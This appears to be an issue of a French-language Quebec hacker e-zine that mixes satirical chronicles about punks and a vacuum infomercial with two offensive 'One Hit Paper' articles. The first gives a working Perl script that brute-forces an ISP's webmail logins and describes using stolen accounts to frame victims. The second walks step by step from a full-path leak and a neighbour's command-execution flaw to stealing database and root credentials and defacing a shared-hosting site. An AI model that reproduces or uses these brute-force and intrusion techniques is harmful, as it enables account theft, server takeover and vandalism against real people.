Un show un peu  chaotique, avec des news,  de la musique, le  tout enhancé
avec du technopolitiks.  Yarr! Un petit  nouveau dans le  space des casts,
avec ses news  avec une tendance  sur le coté  geek de l'informatique,  ça
s'écoute bien  en maudit  avec un  bon rythme  parlé, bien  complémenté de
musique trippante. Découvre le paradis  des Kraken! C'est quoi un  Kraken?
C'est un gros monstre tentaculaire  mystique qui probe les abysses.  C'est
une pieuvre  géante qui  appartien appartien  au monde  fantastique et qui
terrifie les  humains, et  habite les  prondeurs. Découvre  le paradis des
Kraken!


 .---.                                                                      .---.
 |   '---------------------------------------------------------- - ---------'   |
 |                                                                              |
 '------------------------------------------------------------------------------'
 |                                               .---. .---. .-----, .---.      |
 |                                               |   | |   | |  .  | |   |      |
 '-----------------------------------------------'---'-'---'-'-----'-'---'------'

 
 
 
 

 
           .---.  ,---.  .-----,  .---.
          |   |  |   |  |     |  |   |
 .--------|   |--|   |--|  .  |--|   |------------ - -- - - - - - - - - - ------.
 |        |   |  |   |  |     |  |   |	          /Chronique                    |
 '--------'---'--'---'--'-----'--'---'------------------------------- ----------'
 |              __ _ __                              __   _ __                  |
 |                                          __ _ _____                          |
 |  Les écrits de c4ndu                         __ _                            |
 |      __ _ _ __          aka                                                  |
 |     __ _ __ _              Punk Story  -- Révolutionnaire                    |
 |                                                                              |
 '--[par c4ndu]-----------------------------------------------------------------'

Punk Story

Il était près de 2 heures du matin, je crois. Ça faisait presque 6 heures consécutives que j’étais enfermé dans le noir à essayer de faire du montage pour notre prochain film. J’avais besoin d’air, j’avais besoin de me changer les idées. J’ai fermé mes trucs, pris mon sac à dos, ramassé ma camera et je suis allé me chercher un café. En arrivant en ville, j’ai vu quelques punks, avec le logo de l’anarchie de patché sur leur veste. Je me suis dit que ça serait intéressant d’aller les jaser un peu ... Je suis allé me chercher un café, puis je suis allé les rejoindre. On a jasé un peu de la politique impérialiste américaine et du rôle du Canada dans cette pseudo guerre contre le terrorisme. J’ai alors voulu commencer une discussion sur le Venezuela, étant curieux de connaître leur position sur le sujet. Le plus jaseux du groupe m’a coupé la parole pour m’expliquer que pour lui, Bush ou Chavez, c’était la même chose ... Pardon ?! La même chose ? Il était déterminé : ni Dieu, ni maître ... ni Harper, ni Bush, ni Chavez. Rien … le néant ! Aussitôt que je me suis mis à lui expliquer que ma vision de la révolution est, à mon avis, quelque chose qui doit être perçu comme un processus révolutionnaire, il s’est mis à me jacasser un tas de conneries. Lui, il ne veut rien. Il ne veut tellement rien qu’il nous donne l’impression de viser gros. Je réussis finalement à reprendre mes forces et je lui demanda : « c’est quoi, en gros, ton projet ? ». Ne pas participer à ce monde pourri, m’a-t -il répondu. Ha ! Là ça explique tout ! Harper doit être en criss de savoir que ce petit rebelle d’occasion spéciale ne vote pas et ne votera jamais. Sibolo, hein ? Ça doit parler de lui souvent au 24 Sussex... Alors celui qui, 1 heure passée, était un anarchiste, est devenu, dans mon livre, pas mieux que les regardeux de Loft Story ... Ne pas participer, c’est être neutre. Et la neutralité, en politique, n’a servi, ne sert, et ne servira que le pouvoir établi. Refuser un changement sous prétexte que ce n’est pas l’idéal à atteindre, c’est refuser l’évolution. Et en se faisant, c’est renier le principe fondamental de l’anarchisme qui nous unis : la conquête de la liberté. Le seul problème, c’est que pour conquérir quelque chose, il faut commencer par avancer. Un pas à la fois. Une étape à la fois. Une liberté de plus à la fois. Si on se met à cracher sur chaque changement positif, aussi petit soit-il, eh bien on est confiné à demeurer enchaîné pour l’éternité ... En fin de compte, on a jasé un bon 30 minutes. On était assis à une centaine de pieds du McDonald, assez proche quand même, puisque quand leurs amis punk sont sortis du Mcdo avec des hambourgeois, des frites et du Pepsi, ils nous ont aussitôt localisés afin de venir nous rejoindre et partager leur repas. Ni Harper, ni Bush, ni Chavez ... seulement de la merde de clown.

Révolutionnaire !

Vous avez vu le nouvel aspirateur H2O ? Un truc révolutionnaire. C’est simple, mais génial. Au lieu d’aspirer la poussière dans un truc vide ... heu … rempli d’air. Vide de substances, vous saisissez? Je veux dire, c’est vide, mais plein d’air. Mais bon, je continue : au lieu d’aspirer la poussière dans ce vide plein d’air, ça aspire l’air dans ... de l’eau. Oui, oui. De l’eau. Pardon ? De l’eau du robinet ou de la toilette, on s’en fou. Simplement de l’eau. D’où le nom, le H2O ! Pourquoi c’est révolutionnaire ? Le gros patof le dit à la télé, c’est parce qu’au lieu d’aspirer la poussière dans un espace vide rempli d’air, ça aspire la poussière dans l’eau. Et là, la poussière ne peut plus ressortir. Est prise dans l’eau ... la poussière. Emprisonnée, genre. Bref, la poussière est prise ou emprisonnée, on s’en fou, dans l’eau, et non dans un espace vide rempli d’air. Révolutionnaire. C’est ... ça. Uniquement ça. C’est gros quand même. Dit comme ça, sur papier, ça paraît anodin ... mais à la télé, pendant 2 ou 3 heures de suite, le colon, accompagné de sa colonne, le répète continuellement. C’est révolutionnaire, parce que. Et voilà pourquoi. À cause de. C’est démontré de même. Avec des expériences sur des tapis sales et sur des planchers de cuisine qui n’ont jamais été lavés, on le voit clairement. Le but ? J’y arrivais. Quand la poussière entre dans l’espace vide rempli d’air, elle peut s’échapper, comme avec votre vieil aspirateur. Je vous le jure. Elle s’échappe, et elle se rend à vos narines ... directement. Peut -être pas directement, j’avoue, la poussière doit se promener de gauche à droite, mais inévitablement, elle se rend à vos narines. Révolutionnaire. Entre ça et le toaster 4 craques, j’hésite encore. C’est quand même un bon investissement ... mais si je continue à travailler fort, plus fort, encore plus fort, je suis certain que je pourrais me payer le luxe de ne pas avoir de la poussière dans mes narines lorsque je passe l’aspirateur, parce que la poussière est ramassée dans un espace vide remplir d’air au lieu d’être emprisonnée dans de l’eau. Révolutionnaire, qu’il répète sans arrêt. Révolutionnaire ... aussi révolutionnaire qu’un verre rempli de jus d’orange avec-pas-de-pulpe. Encore plus révolutionnaire qu’un crayon à mine auto-rechargable avec support moelleux pour ne pas poigner de crampe à la main. Et moi, je me promène en jet privé le samedi, j’accompagne 2 brebis dans un bal costumé à chaque année, et j’ai déjà connu une roche super sympathique qui avait comme passe-temps le tire à l’arc. Je vous le jure. .---. .---. | '---------------------------------------------------------- - ---------' | | | '------------------------------------------------------------------------------' | .---. .---. .-----, .---. | | | | | | | . | | | | '-----------------------------------------------'---'-'---'-'-----'-'---'------' .---. ,---. .-----, .---. | | | | | | | | .--------| |--| |--| . |--| |------------ - -- - - - - - - - - - ------. | | | | | | | | | /One Hit Paper | '--------'---'--'---'--'-----'--'---'------------------------------- ----------' | __ _ __ __ _ __ | | __ _ _____ | | Owning cheap I.S.P in Quebec __ _ | | __ _ _ __ aka | | __ _ __ _ WYPISWG (what you pay is what you get) | | | '--[par low_rent]--------------------------------------------------------------' ========= I) intro: ========= Hey folks Aujourd'hui nous allons parler d'un mauvais exemple de I.S.P. Ce genre de I.S.P nous offre,un abonnement alléchant avec upload/download illimité , le tout pour ~ 30 $ /mois (avant taxes) Ce qui est relativement le best ici. Effectivement ... c'est le fun , promesse tenu , up/dl illimité , cheap , pas de contrat. Cependant la sécurité des compagnies qui offre ce service est souvent tout autant cheap que l'offre elle-même. ================= II) getting in .. ================= Avec un simple scanner d'ip range,il nous est possible de comprendre l'incompétence de ces sysadmins. http://www.showmyip.com/ IP http://samspade.org/whois/IP .... blabla .... NetRange: 1.1.1.1 - 1.1.255.255 //ip fictifs Kweel ici on a le net range de notre I.S.P Il nous suffit donc, de prendre un scanner d'ip banal , et ainsi rentrer notre I.S.P range ( de :1.1.1.1 à 1.1.255.255 ) Normalement si l'on ferais ceci sur un autre F.A.I on aurais pas grand chose .. mais ici nous sommes en face d'un vrai "winner" En gros sans meme pouvoir vous expliquer concrètement comment on en arrive la chez un F.A.I qui se veux pro, il est possible d'avoir tout les SHARES de nos voisins sur le meme IP range ,c'est à dire que si vous lancez un scan sur ce range, il vous apparaittra que vos voisin est comme sur votre réseau local ... f34r. Ainsi nous avons un reseau local immense , et merci à tout ceux qui font des shares sur ce reseau =). ============================= II.a)owning some user account ============================= Tjrs dans la meme saga , du worst F.A.I in Qc , il nous est possible d'obtenir le user name & passwd de n'importe quel compte très facilement. En effet cet I.S.P nous donne automatiquement,après inscription sur leur réseau,un compte webmail qui a exactement le meme user + passwd que le compte pour notre modem,et si par exemple j'appelle mon F.A.I, pour changer mon password de ma connection, il sera aussi automatiquement updater pour le webmail fucking nice doh... http://www.google.ca/search?q=*@I.S.P.ca => ~7000 users avec cette recherche Oki on a des adresses mail de notre I.S.P ensuite ? Hey on a un webmail interface juste ici : http://webmail.FAI.ca/ il suffit de le dico_bruteforcer,donc: root@low-rent:~# apt-get install spikeproxy root@low-rent:~#spikeproxy firefox -> proxy -> 127.0.0.1:8080 http://spike http://webmail.FAI.ca/ http://spike --> request cache --> Request: POST*.HTTP*.*_webmail.FAI.ca --> Print Request Info :
Site: webmail.FAI.ca Port: 80 SSL: No POST /index.php HTTP/1.1 Host: webmail.FAI.ca User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://blabla.com/ Cookie: blabla=blabla Content-Type: application/x-www-form-urlencoded Content-Length: 71 logout=0&user=yoyo&password=yeahyeah&host=mail.FAI.ca&port=110&rootdir=
Kweel il nous reste plus qu'a faire un pti code du style:
#!/usr/bin/perl ## use IO::Socket; $host= "webmail.FAI.ca"; $path= "/index.php"; open (FUCK, "dico_passwd.txt") || die "couldn't open the file!"; while ($r = ) { $r= substr($r, 0, length($r)-1); print "test:$r\n"; $post= "logout=0&user=USERNAME//SANS_@FAI.CA&password=$r&host=mail.FAI.ca&port=110&rootdir="; $taillePost= length $post; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => 80, Proto => "tcp", ) or die "\nCan't connect !\n"; print $sock "POST $path HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $taillePost\n\n"; print $sock "$post\n"; while ($ans= <$sock>) { if ($ans =~ /folder=INBOX&user=/ ) { print "password = $r\n"; exit; } } close($sock); } close(FUCK);
Bref c'est simple , mais quand on lis la suite ... ca se transforme en shame pour notre FAI. Toute ligne numérisé par bell = y a bon , en gros si vous avez un compte sympatico/bell , vous pouvez vous branchez avec un user du FAI , et si meme vous avez une banale ligne telephonique et vidéotron comme F.A.I, vous pourrez aussi ( en ville ) vous connecter en adsl avec ces infos, et aussi sans affecter sa connection.( syntax: user@FAI.ca ) Now le comble de la situation est que,si moi je roule un server http,ftp,ssh , avec un compte owned , tout sera redirigé chez lui (le gars owned à sont insu)en gros chez vous ces servers ne fonctionneront pas en remote étant donné qu'ils seront fowardé vers le numero de tel de notre ami. Si demain j'attaque n'importe quel site , l'ip/telephone attribué,sera celui de mon nouvel ami, et évidemment à moins d'un serieux doute(comme apres la parution de ce texte)ce sera considéré comme une preuve numérique (f34r). mais voyez-vous mis à part l'image péjorative du BF qui fait un peu ... , on arrive quand meme à usurper facilement des comptes/identitées(ne pensez pas que les users ont des passwd complexes, y a un max de 8 caractères , et les 3/4 du temps le monde n'arrive pas à config donc abc123 ...), et ont peut aussi reconsiderer ce type de proxy dans le cadre actuel, et aussi on a un coté Webappz qui est complètement non securisé contre ce genre d'attaque,de plus on pourrais facilement aller plus loin en pownant le webmail (qui est sois dis en passant, une passoire niveau securité [je vous laisse voir par vous meme: http://ilohamail.org/main.php?page=Downloads ] et ainsi avoir axx à tout les comptes/CB/infos. C'est quand meme la honte si tu peux te faire owned si facilement, on pourrais presque parler de négligeance criminelle :) Je conclurais par: L'offre est alléchante,et les possibilitées le sont tout autant, 2 thumbs up for F.A.I :) .---. .---. | '---------------------------------------------------------- - ---------' | | | '------------------------------------------------------------------------------' | .---. .---. .-----, .---. | | | | | | | . | | | | '-----------------------------------------------'---'-'---'-'-----'-'---'------' .---. ,---. .-----, .---. | | | | | | | | .--------| |--| |--| . |--| |------------ - -- - - - - - - - - - ------. | | | | | | | | | /One Hit Paper | '--------'---'--'---'--'-----'--'---'------------------------------- ----------' | __ _ __ __ _ __ | | __ _ _____ | | Owning some funky webhoster __ _ | | __ _ _ __ aka | | __ _ __ _ two hit ownage | | | '--[par low_rent]--------------------------------------------------------------' Hey folks Aujourd'hui on va parler des webhosters le fun, qui custumise leurs /folder/u/s/user/www/ d'une maniere qui fini par les trahirs. Éffectivement,prennons pour exemple: http://thewebsiteidontlike.com/index.php?var=abc&var2=def Si nous testons toutes les vars pour sql/lfi/rfi/code_exec/etc et le reste du site pour des file.php~ ,.inc, etc, et que nous trouvons rien ,il nous reste encore un espoir: un full path. Wtf pourquoi un full path ? http://www.google.ca/search?hl=fr&q=site:siteidontlike.com+"warning:" rien ? http://siteidontlike.com/index.php?var[]=abc&var2=def //on rentre un array Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home.42/s/i/t/siteidontlike/www/fichier.php on line 15 Si on décortique ce full path,il nous apparais que : /home.42/ => Mr est sur un hébergeur mutualisé,et que il y a pas mal de users =) /s/i/t/ => il y a définitivement du monde la dessus.. /siteidontlike/ => on connais sont username , qui en passant sera pour ftp,ssh,mysql,autre ? :) // d'ou le /s/i/t précedent. Okidoki on a un full path,et on le comprends... mais ou veux tu en venir ? Nous avons rien sur le site en tant que tel, hélas on a pas d'acces local sur le server,donc pas de webserver local hacking. Il nous reste plus qu'a trouver un voisin un peu moins safe : http://www.google.ca/search?hl=fr&q="/home.42/"+[function.main]:+include //évidemment,on peut jouer avec les fonctions recherchées Si on a rien,on sais que il y a surement un /home.41/ un /home.39/ ou autre de toutes facons vu le nombre de personnes par /home.**/ on est sur et certain que google a vu de quoi pour quelqu'un. Après quelques essais à droite à gauche on tombe forcement sur une include ou code_exec ,peut importe le but est d'avoir un acces local sur le server(comme n'importe quel website possède) http://newfriend-at-same-funky-webhoster.com/file.php?cmd=id uid=20401(newfriend) gid=100(users) groups=99(nobody) http://newfriend-at-same-funky-webhoster.com/file.php?cmd=ls /home.42/ ls: /home.42/: Permission denied // shit root@low_rent:~# telnet www.thewebsiteidontlike.com 80 Trying 208.113.128.205... Connected to www.thewebsiteidontlike.com. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.1 200 OK Date: Wed, 16 Jan 2008 22:16:18 GMT Server: Apache/2.2.6 (Unix) mod_throttle/3.1.2 DAV/1.0.3 mod_fastcgi/2.4.2 mod_gzip/1.3.26.1a PHP/5.2.5 mod_ssl/2.8.22 OpenSSL/0.9.7e ...... ..... .... Notre hebergeur ici ,utilise PHP 5.2.5 (derniere version aujourd'hui), on peut constater qu'il se tiens relativement à jour,mais qu'il a quand meme quelques lacunes niveau configuration pour httpd.conf et php.ini (httpd.conf: ServerSignature Off , ServerTokens Prod et php.ini: expose_php = Off) :) on peut tenter sa chance avec un : Escape character is '^]'. OPTIONS / HTTP/1.0 Allow: GET, HEAD, POST,TRACE Bon pas de chance ... allons voir du coté de mysql. http://newfriend-at-same-funky-webhoster.com/file.php?cmd=cat ./config.php // ** reglages MySQL ** // define('DB_NAME', 'newfriend_blog'); define('DB_USER', 'newfriend'); define('DB_PASSWORD', 'uQFzRvog'); define('DB_HOST', 'localhost'); Oki now,faut trouver phpmyadmin (sur un hébergeur , on utilise généralement ,par simplicité pour les users, phpmyadmin) http://samspade.org/ ==> newfriend-at-same-funky-webhoster.com .... blabla .... nserver: ns1.webhoster.com Ok on sais chez qui est notre ami,il ne nous reste plus qu'a trouver le forum du webhost , avec un post pour phpmyadmin (qui nous donneras le link de phpmyadmin). http://www.google.ca/search?hl=fr&q=site:webhoster.com +forum +phpmyadmin +help Ca ne rate jamais, on le trouve tout de suite. http://sql.webhoster.com/PhpMyAdmin/ login :newfriend passwd :uQFzRvog loggued kweel. On ouvre l'invite de commande SQL et on pourrais commencer par: SELECT 'hey i dont like you' INTO DUMPFILE '/home.42/s/i/t/siteidontlike/www/index.html'; On check sur http://thewebsiteidontlike.com/ si ca a fonctionné , oui/non ? Ca depends des droits du user... anyways on va dire non . Alors on va créer une table 'yo' dans la database newfriend_blog,ensuite on retourne à notre invite de cmd mysql et on execute: LOAD DATA LOCAL INFILE './config.inc.php' INTO TABLE newfriend_blog.yo; //par default On dans my.cnf,section [mysqld],local-infile=1,si il est pas la c'est qu'il est quand meme On. --> Nombre d'enregistrements insérés : 42 (Traitement en 0.0004 sec.) //working :) On check notre table "yo", et on cherche les accès phpmyadmin $cfg['Servers'][$i]['user'] = 'root'; // on a un winner!! $cfg['Servers'][$i]['password'] = 'im_not_smart_at_all'; //party hardy,let's try this shit. root@owned_box:~# ssh root@www.1owned_box.com root@1owned_box:~# ssh root@www.2owned_box.com root@2owned_box:~# ssh root@www.3owned_box.com root@3owned_box:~# nmap -v -p- -P0 www.webhoster.com .... Discovered open port 62123/tcp .... 62123/tcp open ssh .... root@3other_box_owned:~# ssh root@www.webhoster.com -p 62123 login:root passwd:im_not_smart_at_all Linux webhoster 2.6.22-1-686 #1 SMP Fri Aug 3 23:51:24 UTC 2007 i686 webhoster:~# vim /home.42/s/i/t/siteidontlike/www/index.html hey i dont like you ! :wq webhoster:~# voila,c'est fait,notre ami sais que on l'aime pas, il se couchera surement moins con ce soir. Bref tout ca a commencé avec quoi ? Un full path qui est unique,sans ce full path on aurais pas pu faire grand chose de concret,car si par exemple on avais eu un : /home/siteidontlike/www/ ,google pas google,on se serais plongé dans des heures et des heures de recherche qui nous aurais finalement rien donné. mais la,grace a ce full path révélateur,nous avons pu retrouver d'autre site sur le MEME server, et ainsi par quelques entourloupes made in google, en prendre le controle. See ya for a next episode. .---. .---. | '---------------------------------------------------------- - ---------' | | | '------------------------------------------------------------------------------' | .---. .---. .-----, .---. | | | | | | | . | | | | '-----------------------------------------------'---'-'---'-'-----'-'---'------' .--------------------------------- - ------------------------------------------. | the end - Notepad special __ [] X | '------------------------------------------------------------------------------' | File Edit Format View Help | '---------------------------------------------------------------------------.--' | Greetz to c4ndu pour les ASCII originaux. |/\| | Anti-greetz pour les claviers logitechs pas de insert button. '--' ' | | | | | | Mindkind tient à remercier les lémuriens sur #mindkind Undernet | | | qui idle et parle de porn plus que d'autres choses, mais thats what | | | online life is about ehh? | | | | | | Bon j'ai faim la, faudrait que je dise de quoi pour terminer ça... | | . | | | [16:43] <Seriousman> on dirai qu'un grand bust aura lieu | | | [16:43] <LastCall_> haha | | | [16:43] <LastCall_> ouan yon confisquer les ASCII à c4ndu... | | | [16:43] <LastCall_> ça respectait pas une norme iso genre. | | | [16:43] <Seriousman> hahaha | | | [16:43] <LastCall_> (fuckin' nimporte koi) | | | [16:43] <vn> haha | | | | | | Me semble ça serait cool de rajouter un curseur? dans le notepad... | | | C't'en pense c4ndu?| | | | .--. | |\/| .---.-------------------------------------------------------------------.---'--' | < | | > | | '---'-------------------------------------------------------------------'---'--' .--------. ________________________________________________________________ / /| /___ www.MindKind.org ______/ .--------' | /__ #mindkind undernet ____/ | | | \ ___ wyzeman@mindkind.org _____\ | EOF | | \_______________________________________________________________\ | |/ '--------'